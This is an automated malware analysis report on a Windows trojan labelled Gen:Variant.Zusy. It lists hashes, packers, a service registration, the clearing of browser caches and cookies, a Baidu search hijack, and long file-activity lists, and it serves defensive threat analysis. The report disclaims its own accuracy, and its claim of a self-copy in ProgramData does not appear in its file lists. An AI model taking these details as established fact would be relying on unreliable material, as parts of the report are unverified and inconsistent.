Gen.Variant.Zusy.208909_86ae566339

by malwarelabrobot on November 23rd, 2016 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Zusy.208909 (B) (Emsisoft), Gen:Variant.Zusy.208909 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


This description has been generated automatically by the Lavasoft Malware Analysis System and may contain incomplete or inaccurate information.



MD5: 86ae56633941c20e9a65a719b5a23208
SHA1: 230b6f0d9e33824cb8e5982e93117e740dbff1d0
SHA256: c301533198b01066be1ad7d5be88d011dd9dcdaefb3136e9db4e89d2d6a283ca
SSDeep: 24576:lhXyIPRL1bubRxgh5XjFmTNTOUOM8 SIsLve5vDv5EPNV3t:lh9Js4zsTccynrehkb3
Size: 1024496 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PECompactV2X, PECompactv20, UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-09 05:44:39
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload was identified by the automated analysis. The recorded behaviour is nevertheless informative: the sample writes a copy of itself to C:\ProgramData\prjNVt\, registers a service VIqWRnjsVne with Type 1 (SERVICE_KERNEL_DRIVER) and Start 3 (SERVICE_DEMAND_START), deletes Internet Explorer, Firefox and Chrome cache and cookie files, and rewrites the Internet Explorer search scope URL to a baidu.com query carrying a tn= affiliate tag, which is behaviour consistent with a browser search hijacker.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:3884

The Trojan injects its code into the following process(es) (the file name matches the copy of the sample written to C:\ProgramData\prjNVt\, see File activity below):

86ae56633941c20e9a65a719b5a2208.exe:2388

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process 86ae56633941c20e9a65a719b5a2208.exe:2388 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\20ed6a\CDClient_EX.sys (125 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
C:\Windows\YbfHFk\iAFqcX.dll (15859 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
C:\Windows\CLOG.txt (87 bytes)
C:\Windows\YbfHFk\NLVhhEmUa.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Windows\YbfHFk\DvMtvJIVG.dll (279 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Windows\xEQSlj.dll (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Windows\hlog.txt (981 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\339A4E96E26DFFA4704F0AF081D2B85B12D03939 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Windows\System32\20ed6a\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PFR2GFQJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_003_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\752D7BD4AC91C2896126814F19AB222919A62B68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\f_000006 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Windows\YbfHFk\DvMtvJIVG.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B2FB183F32D320CA4ACEF3D6214726E37DA08535 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SN1VAMHK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Windows\YbfHFk\NLVhhEmUa.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DA70B9EE949D3ADCBE10033750AB47FFEA045E3E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2031416DA0EBB4347FFB723FC4B4C3289383F1C7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\F0687D4CB965F097204F417DFBDC74BC5950135F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\698AC159A6BCBA0D13FE6F10F1A38E498F826F33 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1C849477DE15B1F8F2245945F3F44468F58146DF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9C2602C28BD668BB4AE4681731BA564B00BDA3E4 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJQLWW1A.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8035BC2ABB17F717B57A550CC9E2EF7580417F69 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\165A82B735DDDE6F05E29A770A52297EAE982902 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\9UFT3VMU.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\YJCP8HIK.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\98F3CC667C872833F2A93C841A531CD308BB708E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2F56B586A819A62543E0EBD916F11DAAD2CCD424 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\BFEBBC0ACB3B39D75483B76F4E7AEC3C2D363FF5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0F161541D0AEA6CD932E2BF6FB045B97389F9A5A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\A5VV6NGJ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\1I56O6EZ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7E882DAC0955721D3A046FDC6431463C3E3D0655 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\directoryLinks.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B8A48CBFE22CD43A122B2A63C67009F5CC043432 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5902F6289661A11B83C4457A92FA159F59FE812E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\startupCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\59A2A51D07303AA6BDB591966C4388DFB3BB359E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B73E4A4438B9B71F020E7D4B54AE283770E47CA7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache\index.sqlite (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\079225D0110CA684572A47D7287538AEB72DE9DD (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C9C0AB304A24D626A01D04F597B8F4DA1C0BB353 (0 bytes)
